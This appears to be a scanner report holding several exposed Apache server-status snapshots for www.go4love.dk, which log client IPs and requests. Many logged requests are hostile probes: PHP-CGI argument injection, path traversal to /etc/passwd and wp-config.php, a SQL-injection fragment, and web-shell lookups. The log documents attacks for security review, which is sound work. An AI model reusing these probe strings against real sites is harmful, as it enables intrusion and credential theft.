Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Tuesday, 22-Oct-2024 08:54:21 CEST Restart Time: Tuesday, 22-Oct-2024 06:05:04 CEST Parent Server Generation: 2 Server uptime: 2 hours 49 minutes 17 seconds Total accesses: 13514 - Total Traffic: 7.3 MB CPU Usage: u1.37 s.56 cu0 cs0 - .019% CPU load 1.33 requests/sec - 751 B/second - 564 B/request 1 requests currently being processed, 30 idle workers ____________________.....__W..________.......................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-2137050/15/406_ 0.052100.00.010.27 167.172.158.128webhotel5.webhosting.dkGET / HTTP/1.0 1-2137060/15/406_ 0.03260.00.000.14 167.172.158.128webhotel5.webhosting.dkGET / HTTP/1.0 2-2136870/16/406_ 0.053000.00.010.23 172.71.31.46webhotel5.webhosting.dkGET /aab9 HTTP/1.0 3-2137210/11/398_ 0.033070.00.000.20 172.71.30.193webhotel5.webhosting.dkGET / HTTP/1.0 4-2137220/11/398_ 0.0330150.00.000.28 172.69.70.238webhotel5.webhosting.dkGET / HTTP/1.0 5-2137230/11/397_ 0.033070.00.000.38 172.71.30.144webhotel5.webhosting.dkGET / HTTP/1.0 6-2137240/11/398_ 0.033010.00.000.16 172.68.71.150webhotel5.webhosting.dkGET /aab9 HTTP/1.0 7-2137420/9/396_ 0.0330100.00.000.14 172.69.70.16webhotel5.webhosting.dkGET / HTTP/1.0 8-2137430/9/396_ 0.0230100.00.000.19 172.71.23.212webhotel5.webhosting.dkGET / HTTP/1.0 9-2137440/9/395_ 0.022900.00.000.16 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 10-2137450/9/395_ 0.002100.00.000.14 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 11-2137460/9/395_ 0.0217250.00.000.22 216.244.66.241www.valloe.orgGET /robots.txt HTTP/1.0 12-2137470/9/392_ 0.031660.00.000.16 69.162.124.228webhotel5.webhosting.dkHEAD / HTTP/1.0 13-2137480/9/392_ 0.011500.00.000.19 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 14-2137490/9/392_ 0.0211100.00.000.13 54.36.149.20webhotel5.webhosting.dkGET / HTTP/1.0 15-2137520/8/391_ 0.01000.00.000.20 167.172.158.128webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 16-2137530/8/391_ 0.02100.00.010.17 167.172.158.128webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 17-2137540/8/390_ 0.02010.00.010.25 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 18-2137550/8/387_ 0.01100.00.000.18 167.172.158.128webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 19-2137560/8/383_ 0.02100.00.000.15 167.172.158.128webhotel5.webhosting.dkGET /server HTTP/1.0 20-2-0/0/383. 0.1027970.00.000.19 205.210.31.38webhotel5.webhosting.dkGET / HTTP/1.0 21-2-0/0/374. 0.1227900.00.000.25 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 22-2-0/0/375. 0.1412800.00.000.13 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 23-2-0/0/370. 0.1312700.00.000.17 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 24-2-0/0/355. 0.1511200.00.000.28 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 25-2137570/8/350_ 0.01100.00.000.25 167.172.158.128webhotel5.webhosting.dkGET /about HTTP/1.0 26-2137580/8/347_ 0.02020.00.000.17 167.172.158.128webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 27-2137590/7/347W 0.02000.00.000.19 167.172.158.128webhotel5.webhosting.dkGET /server-status HTTP/1.0 28-2-0/0/328. 0.1112600.00.000.23 89.248.163.208webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 29-2-0/0/327. 0.103900.00.000.25 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 30-2137600/8/285_ 0.02000.00.000.20 167.172.158.128webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 31-2137610/7/315_ 0.033000.00.000.27 172.69.71.216webhotel5.webhosting.dkGET /aaa9 HTTP/1.0 32-2137620/7/304_ 0.013000.00.000.14 172.68.71.136webhotel5.webhosting.dkGET /aab9 HTTP/1.0 33-2137630/8/305_ 0.0230100.00.000.16 172.69.71.117webhotel5.webhosting.dkGET / HTTP/1.0 34-2137640/7/230_ 0.023010.00.000.17 172.69.70.168webhotel5.webhosting.dkGET /aab9 HTTP/1.0 35-2137650/7/175_ 0.033080.00.000.05 172.68.71.136webhotel5.webhosting.dkGET / HTTP/1.0 36-2137660/5/173_ 0.006210.00.000.07 47.128.113.4webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 37-2137670/7/125_ 0.0330110.00.000.11 172.71.23.211webhotel5.webhosting.dkGET / HTTP/1.0 38-1-0/0/18. 0.04325100.00.000.00 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 39-1-0/0/18. 0.05325100.00.000.01 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 40-1-0/0/18. 0.06325100.00.000.00 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 41-1-0/0/18. 0.04325100.00.000.02 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 42-1-0/0/18. 0.06325100.00.000.00 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 43-1-0/0/18. 0.05325100.00.000.00 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 44-1-0/0/17. 0.06325100.00.000.01 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 45-1-0/0/17. 0.03325100.00.000.00 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3bdf39622
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Sunday, 20-Oct-2024 07:59:07 CEST Restart Time: Sunday, 20-Oct-2024 06:10:04 CEST Parent Server Generation: 1 Server uptime: 1 hour 49 minutes 3 seconds Total accesses: 16541 - Total Traffic: 7.9 MB CPU Usage: u2.27 s1.33 cu0 cs0 - .055% CPU load 2.53 requests/sec - 1270 B/second - 502 B/request 1 requests currently being processed, 34 idle workers _____________________W_____________............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-1381470/34/504_ 0.07100.00.010.17 193.176.86.134webhotel5.webhosting.dkGET /403.php HTTP/1.0 1-1381420/34/450_ 0.05210.00.010.14 143.110.213.72webhotel5.webhosting.dkGET /server HTTP/1.0 2-1381480/34/500_ 0.06110.00.010.17 143.110.213.72webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 3-1381460/34/499_ 0.05100.00.010.15 193.176.86.134webhotel5.webhosting.dkGET /item.php HTTP/1.0 4-1381510/33/448_ 0.04200.00.010.13 193.176.86.134webhotel5.webhosting.dkGET /as.php HTTP/1.0 5-1381520/33/498_ 0.06100.00.010.14 193.176.86.134webhotel5.webhosting.dkGET /.well-known/pki-validation/index.php HTTP/1.0 6-1381530/33/498_ 0.06100.00.010.16 143.110.213.72webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 7-1381540/33/494_ 0.04110.00.010.14 193.176.86.134webhotel5.webhosting.dkGET /lock360.php HTTP/1.0 8-1381590/33/494_ 0.07000.00.010.24 193.176.86.134webhotel5.webhosting.dkGET /wp-admin/user/file.php HTTP/1.0 9-1381600/33/494_ 0.05100.00.012.27 193.176.86.134webhotel5.webhosting.dkGET /shell.php HTTP/1.0 10-1381610/33/493_ 0.04010.00.010.24 143.110.213.72webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 11-1381620/32/492_ 0.05227820.00.010.15 143.110.213.72webhotel5.webhosting.dkGET / HTTP/1.0 12-1381630/32/492_ 0.05224370.00.010.14 143.110.213.72webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 13-1381640/32/442_ 0.0625710.00.010.21 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 14-1381650/32/441_ 0.06100.00.010.13 143.110.213.72webhotel5.webhosting.dkGET /about HTTP/1.0 15-1381660/32/441_ 0.05200.00.010.14 193.176.86.134webhotel5.webhosting.dkGET /dir.php HTTP/1.0 16-1381680/32/391_ 0.05000.00.010.11 193.176.86.134webhotel5.webhosting.dkGET /wp-includes/Text/about.php HTTP/1.0 17-1381690/32/389_ 0.05000.00.010.12 193.176.86.134webhotel5.webhosting.dkGET /wp-info.php HTTP/1.0 18-1381700/32/440_ 0.05000.00.010.15 143.110.213.72webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 19-1381710/32/440_ 0.05000.00.010.14 193.176.86.134webhotel5.webhosting.dkGET /wp-includes/SimplePie/about.php HTTP/1.0 20-1381720/32/388_ 0.07000.00.010.12 193.176.86.134webhotel5.webhosting.dkGET /wp-content/tmpls.php HTTP/1.0 21-1381730/31/389W 0.05000.00.010.11 143.110.213.72webhotel5.webhosting.dkGET /server-status HTTP/1.0 22-1381740/31/389_ 0.04800.00.010.13 193.176.86.134webhotel5.webhosting.dkGET /wp-content/plugins/admin.php HTTP/1.0 23-1381750/31/388_ 0.05800.00.010.13 193.176.86.134webhotel5.webhosting.dkGET /wp-includes/images/wp-login.php HTTP/1.0 24-1381760/31/439_ 0.05700.00.010.12 193.176.86.134webhotel5.webhosting.dkGET /wp-includes/about.php HTTP/1.0 25-1381770/31/339_ 0.06700.00.010.18 193.176.86.134webhotel5.webhosting.dkGET /wp-content/plugins/WordPressCore/include.php HTTP/1.0 26-1381780/31/389_ 0.07700.00.010.12 193.176.86.134webhotel5.webhosting.dkGET /wp-content/admin.php HTTP/1.0 27-1381790/31/389_ 0.05700.00.010.26 193.176.86.134webhotel5.webhosting.dkGET /cgi-bin/plugins.php HTTP/1.0 28-1381800/31/389_ 0.05700.00.010.18 193.176.86.134webhotel5.webhosting.dkGET /wp-content/themes/bltm/wp-login.php HTTP/1.0 29-1381810/31/381_ 0.06600.00.010.11 193.176.86.134webhotel5.webhosting.dkGET /wp-content/plugins/WordPressCore/include.php HTTP/1.0 30-1381820/31/381_ 0.05242800.00.010.11 193.176.86.134webhotel5.webhosting.dkGET /worksec.php HTTP/1.0 31-1381830/31/376_ 0.05231280.00.010.12 143.110.213.72webhotel5.webhosting.dkGET / HTTP/1.0 32-1407830/0/314_ 0.11400.00.000.10 185.153.151.145webhotel5.webhosting.dkGET /.well-known/classwithtostring.php HTTP/1.0 33-1407850/0/250_ 0.10300.00.000.11 185.153.151.145webhotel5.webhosting.dkGET /black.php HTTP/1.0 34-1407860/0/250_ 0.13300.00.000.08 185.153.151.145webhotel5.webhosting.dkGET /wp-includes/IXR/about.php HTTP/1.0 35-1-0/0/250. 0.1239300.00.000.07 185.153.151.145webhotel5.webhosting.dkGET /buy.php HTTP/1.0 36-1-0/0/200. 0.1239300.00.000.06 185.153.151.145webhotel5.webhosting.dkGET /wp-content/themes/pridmag/db.php?u HTTP/1.0 37-1-0/0/150. 0.1139300.00.000.13 185.153.151.145webhotel5.webhosting.dkGET /wp-admin/network/plugins.php HTTP/1.0 38-1-0/0/150. 0.1239300.00.000.04 185.153.151.145webhotel5.webhosting.dkGET /.well-known/pki-validation/classwithtostring.php HTTP/1.0 39-1-0/0/150. 0.1239300.00.000.06 185.153.151.145webhotel5.webhosting.dkGET /wp-includes/customize/about.php HTTP/1.0 40-1-0/0/150. 0.1339300.00.000.04 51.15.16.101webhotel5.webhosting.dkGET /style.php HTTP/1.0 41-1-0/0/100. 0.1239300.00.000.03 185.153.151.145webhotel5.webhosting.dkGET /word.php HTTP/1.0 42-1-0/0/100. 0.1339300.00.000.13 185.153.151.145webhotel5.webhosting.dkGET /wp-content/plugins/wp-theme-editor/include.php HTTP/1.0 43-1-0/0/100. 0.1039200.00.000.03 185.153.151.145webhotel5.webhosting.dkGET /wp-content/plugins/sid/sidwso.php HTTP/1.0 44-1-0/0/100. 0.1139200.00.000.03 185.153.151.145webhotel5.webhosting.dkwp-includes/js/tinymce/skins/lightgray/fonts/index.php HTTP/1.0 45-1-0/0/100. 0.1239200.00.000.03 185.153.151.145webhotel5.webhosting.dkGET /wp-includes/file.php HTTP/1.0 46-1-0/0/100. 0.1239200.00.000.03 185.153.151.145webhotel5.webhosting.dkGET /wp-admin/css/colors/blue/file.php HTTP/1.0 47-1-0/0/100. 0.1339200.00.000.03 185.153.151.145webhotel5.webhosting.dkGET /.well-known/pki-validation/scripts.php HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of mo
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3088c8d22
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Friday, 18-Oct-2024 07:35:47 CEST Restart Time: Friday, 18-Oct-2024 06:10:04 CEST Parent Server Generation: 1 Server uptime: 1 hour 25 minutes 43 seconds Total accesses: 9010 - Total Traffic: 4.8 MB CPU Usage: u1.31 s.77 cu0 cs0 - .0404% CPU load 1.75 requests/sec - 968 B/second - 552 B/request 1 requests currently being processed, 32 idle workers ________________________________W............................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-1450360/20/272_ 0.04270.00.010.18 68.183.147.34webhotel5.webhosting.dkGET / HTTP/1.0 1-1449570/26/279_ 0.041500.00.010.18 89.248.163.130webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 2-1449670/23/276_ 0.051410.00.010.09 89.248.163.208webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 3-1449680/23/276_ 0.041500.00.010.10 81.19.232.105www.brandstation.infoGET /RDWeb/Pages/en-US/login.aspx HTTP/1.0 4-1449690/23/276_ 0.047280.00.010.19 47.128.114.178www.discteknik.dkGET /Schnabel/3fds560.htm HTTP/1.0 5-1449600/25/278_ 0.06360.00.010.34 68.183.147.34webhotel5.webhosting.dkGET / HTTP/1.0 6-1450220/21/274_ 0.04300.00.010.18 68.183.147.34webhotel5.webhosting.dkGET /favicon.ico HTTP/1.0 7-1450230/20/273_ 0.033000.00.010.20 89.248.163.208webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 8-1450240/20/273_ 0.042750.00.010.13 43.130.39.101webhotel5.webhosting.dkGET / HTTP/1.0 9-1450250/20/272_ 0.032520.00.010.10 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 10-1450260/20/273_ 0.042400.00.010.16 89.248.163.208webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 11-1450370/20/273_ 0.04200.00.010.10 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 12-1450380/20/273_ 0.03200.00.010.10 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 13-1450390/20/273_ 0.03100.00.010.11 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 14-1450270/20/272_ 0.041600.00.010.15 89.248.163.130webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 15-1450280/20/273_ 0.041610.00.010.09 89.248.163.130webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 16-1450300/20/273_ 0.031510.00.010.22 89.248.163.130webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 17-1449610/24/277_ 0.041500.00.010.22 89.248.163.130webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 18-1450400/20/273_ 0.040110.00.010.20 165.227.173.41webhotel5.webhosting.dkGET / HTTP/1.0 19-1450410/20/273_ 0.04000.00.010.11 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 20-1449700/23/226_ 0.031220.00.010.08 89.248.163.130webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 21-1450420/20/273_ 0.04060.00.010.10 165.227.173.41webhotel5.webhosting.dkGET / HTTP/1.0 22-1450430/20/223_ 0.04010.00.010.09 165.227.173.41webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 23-1450440/20/223_ 0.03000.00.010.09 165.227.173.41webhotel5.webhosting.dkGET /server HTTP/1.0 24-1450450/20/223_ 0.03000.00.010.09 165.227.173.41webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 25-1450460/20/219_ 0.03000.00.010.25 165.227.173.41webhotel5.webhosting.dkGET /about HTTP/1.0 26-1450470/19/219_ 0.043000.00.000.09 89.248.163.208webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 27-1450480/20/223_ 0.05010.00.010.10 165.227.173.41webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 28-1422620/47/197_ 0.11690.00.020.11 147.185.132.85webhotel5.webhosting.dkGET / HTTP/1.0 29-1449340/28/178_ 0.06620.00.010.08 47.128.114.178www.discteknik.dkGET /Schnabel/3fds560.JPG HTTP/1.0 30-1450490/20/170_ 0.04010.00.010.06 165.227.173.41webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 31-1450500/20/170_ 0.04010.00.010.06 165.227.173.41webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 32-1450510/19/169W 0.05000.00.010.05 165.227.173.41webhotel5.webhosting.dkGET /server-status HTTP/1.0 33-1-0/0/150. 0.09230180.00.000.06 98.161.239.88www.lillekrabbe.dkGET /lab/dollmaker/devilred.gif HTTP/1.0 34-1-0/0/150. 0.09230160.00.000.13 98.161.239.88www.lillekrabbe.dkGET /lab/dollmaker/earrings.gif HTTP/1.0 35-0-0/0/53. 0.01213500.00.000.01 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 36-0-0/0/53. 0.00213500.00.000.02 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 37-0-0/0/53. 0.00213500.00.000.03 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 38-0-0/0/53. 0.00213500.00.000.01 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 39-0-0/0/53. 0.01213500.00.000.02 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 40-0-0/0/50. 0.11382200.00.000.01 157.245.156.90webhotel5.webhosting.dkGET /wp-includes/rest-api/endpoints/about.php HTTP/1.0 41-0-0/0/50. 0.11382600.00.000.02 157.245.156.90webhotel5.webhosting.dkGET /wp-admin/images/about.php HTTP/1.0 42-0-0/0/50. 0.10382600.00.000.02 157.245.156.90webhotel5.webhosting.dkGET /wp-includes/block-patterns/about.php HTTP/1.0 43-0-0/0/50. 0.09382600.00.000.01 157.245.156.90webhotel5.webhosting.dkGET /wp-includes/fonts/about.php HTTP/1.0 44-0-0/0/50. 0.10382600.00.000.01 157.245.156.90webhotel5.webhosting.dkGET /assets/images/about.php HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde339751497
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Wednesday, 16-Oct-2024 11:58:32 CEST Restart Time: Wednesday, 16-Oct-2024 06:05:10 CEST Parent Server Generation: 5 Server uptime: 5 hours 53 minutes 22 seconds Total accesses: 27958 - Total Traffic: 17.5 MB CPU Usage: u2.45 s1.32 cu0 cs0 - .0178% CPU load 1.32 requests/sec - 866 B/second - 656 B/request 1 requests currently being processed, 29 idle workers _____________W______._._____.____............................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-5460070/6/832_ 0.00900.00.000.68 34.41.105.124webhotel5.webhosting.dkOST /uapim/upload/grouptemplet?groupid=79&fileType=jsp HTTP/1.0 1-5460390/5/814_ 0.00910.00.000.53 34.41.105.124webhotel5.webhosting.dkPOST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.0 2-5460400/5/807_ 0.015100.00.000.40 45.227.254.34webhotel5.webhosting.dkGET / HTTP/1.0 3-5460410/5/819_ 0.00010.00.001.51 96.126.110.181webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 4-5460420/4/754_ 0.0010160.00.000.46 34.41.105.124webhotel5.webhosting.dkPOST /Proxy HTTP/1.0 5-5460440/4/815_ 0.001020.00.000.43 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 6-5460450/4/803_ 0.001000.00.000.46 34.41.105.124webhotel5.webhosting.dk.fn_sqlvarbasetostr(HASHBYTES('MD5'%2C'999999999'))--+ HTTP/1.0 7-5460620/5/802_ 0.00610.00.001.47 34.41.105.124webhotel5.webhosting.dkGET /2nVyHTx1Q68rdF0W6AU0H4GYY1j.jsp HTTP/1.0 8-5460710/3/799_ 0.00610.00.000.34 34.41.105.124webhotel5.webhosting.dkGET /ncupload/n2d19a.jsp HTTP/1.0 9-5460720/4/801_ 0.01410.00.000.80 89.106.206.198webhotel5.webhosting.dkGET /wp-login.php HTTP/1.0 10-5461340/3/797_ 0.0010140.00.000.33 34.41.105.124webhotel5.webhosting.dkPOST /aim/equipmap/accept.jsp HTTP/1.0 11-5460840/4/802_ 0.00000.00.000.42 96.126.110.181webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 12-5460850/3/796_ 0.011170.00.000.49 34.41.105.124webhotel5.webhosting.dkGET /?mdocs-img-preview=../../../wp-config.php HTTP/1.0 13-5460860/3/799W 0.00000.00.000.52 96.126.110.181webhotel5.webhosting.dkGET /server-status HTTP/1.0 14-5461620/3/798_ 0.01270.00.000.45 96.126.110.181webhotel5.webhosting.dkGET / HTTP/1.0 15-5460870/3/794_ 0.0010240.00.000.37 34.41.105.124webhotel5.webhosting.dkGET /service/~baseapp/UploadServlet HTTP/1.0 16-5461490/3/795_ 0.00900.00.000.40 89.69.118.88webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 17-5461500/3/795_ 0.00910.00.000.38 34.41.105.124webhotel5.webhosting.dkPOST /ServiceDispatcherServlet HTTP/1.0 18-5462580/1/792_ 0.00810.00.000.46 34.41.105.124webhotel5.webhosting.dkldata.php?DontCheckLogin=1&filePath=c:/windows/win.ini HTTP/1.0 19-5461550/3/796_ 0.019190.00.000.39 34.41.105.124webhotel5.webhosting.dkGET /?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= HTTP/1.0 20-5-0/0/793. 0.132700.00.000.40 34.41.105.124webhotel5.webhosting.dkET /wp-content/uploads/2nVyHUcMP0hrgcE3v3u88slvubU.php HTTP/1.0 21-5461560/3/765_ 0.00710.00.000.36 34.41.105.124webhotel5.webhosting.dkGET /Export_Log?/etc/passwd HTTP/1.0 22-5-0/0/789. 0.131760.00.000.44 34.41.105.124webhotel5.webhosting.dkGET / HTTP/1.0 23-5461570/3/794_ 0.00700.00.000.51 34.41.105.124webhotel5.webhosting.dkPOST /ztp/cgi-bin/handler HTTP/1.0 24-5461580/3/778_ 0.00710.00.000.38 34.41.105.124webhotel5.webhosting.dkeditor/php/controller.php?action=catchimage&upfolder=1 HTTP/1.0 25-5461630/3/723_ 0.00310.00.000.32 205.196.217.51webhotel5.webhosting.dkGET /wp-login.php HTTP/1.0 26-5461640/3/780_ 0.022110.00.000.50 96.126.110.181webhotel5.webhosting.dkGET / HTTP/1.0 27-5461650/3/768_ 0.00100.00.000.56 96.126.110.181webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 28-5-0/0/668. 0.082400.00.000.38 34.41.105.124webhotel5.webhosting.dkGET //wp-config.inc HTTP/1.0 29-5461660/3/721_ 0.00100.00.000.32 96.126.110.181webhotel5.webhosting.dkGET /server HTTP/1.0 30-5461670/3/582_ 0.00110.00.000.31 96.126.110.181webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 31-5461680/3/597_ 0.00100.00.000.37 96.126.110.181webhotel5.webhosting.dkGET /about HTTP/1.0 32-5461690/3/512_ 0.00000.00.000.24 96.126.110.181webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 33-5-0/0/360. 0.132300.00.000.18 34.41.105.124webhotel5.webhosting.dkGET //wp-config.php.dist HTTP/1.0 34-5-0/0/309. 0.122810.00.000.12 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 35-5-0/0/259. 0.132310.00.000.11 34.41.105.124webhotel5.webhosting.dkGET //wp-config.php.OLD HTTP/1.0 36-5-0/0/200. 0.093400.00.000.07 34.41.105.124webhotel5.webhosting.dkPOST /weaver/bsh.servlet.BshServlet HTTP/1.0 37-5-0/0/150. 0.091500.00.000.05 34.41.105.124webhotel5.webhosting.dkGET //config.php.zip HTTP/1.0 38-5-0/0/150. 0.093400.00.000.05 34.41.105.124webhotel5.webhosting.dkPOST /wp-admin/admin-ajax.php HTTP/1.0 39-5-0/0/150. 0.082800.00.000.05 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 40-5-0/0/50. 0.14139600.00.000.01 34.46.94.230webhotel5.webhosting.dkGET /rwwbs.php HTTP/1.0 41-5-0/0/50. 0.12138500.00.000.01 34.46.94.230webhotel5.webhosting.dkGET //wp-config.php.html HTTP/1.0 42-5-0/0/50. 0.12138200.00.000.01 34.46.94.230webhotel5.webhosting.dk/wordfenceClass.php?file=/../../../../../../etc/passwd HTTP/1.0 43-5-0/0/50. 0.11140400.00.000.01 34.68.115.52webhotel5.webhosting.dkGET /.well-known/ai-plugin.json HTTP/1.0 44-5-0/0/50. 0.11139600.00.000.01 34.68.115.52webhotel5.webhosting.dkGET /simplesaml/module.php/core/frontpage_welcome.php HTTP/1.0 45-5-0/0/50. 0.13138960.00.000.01 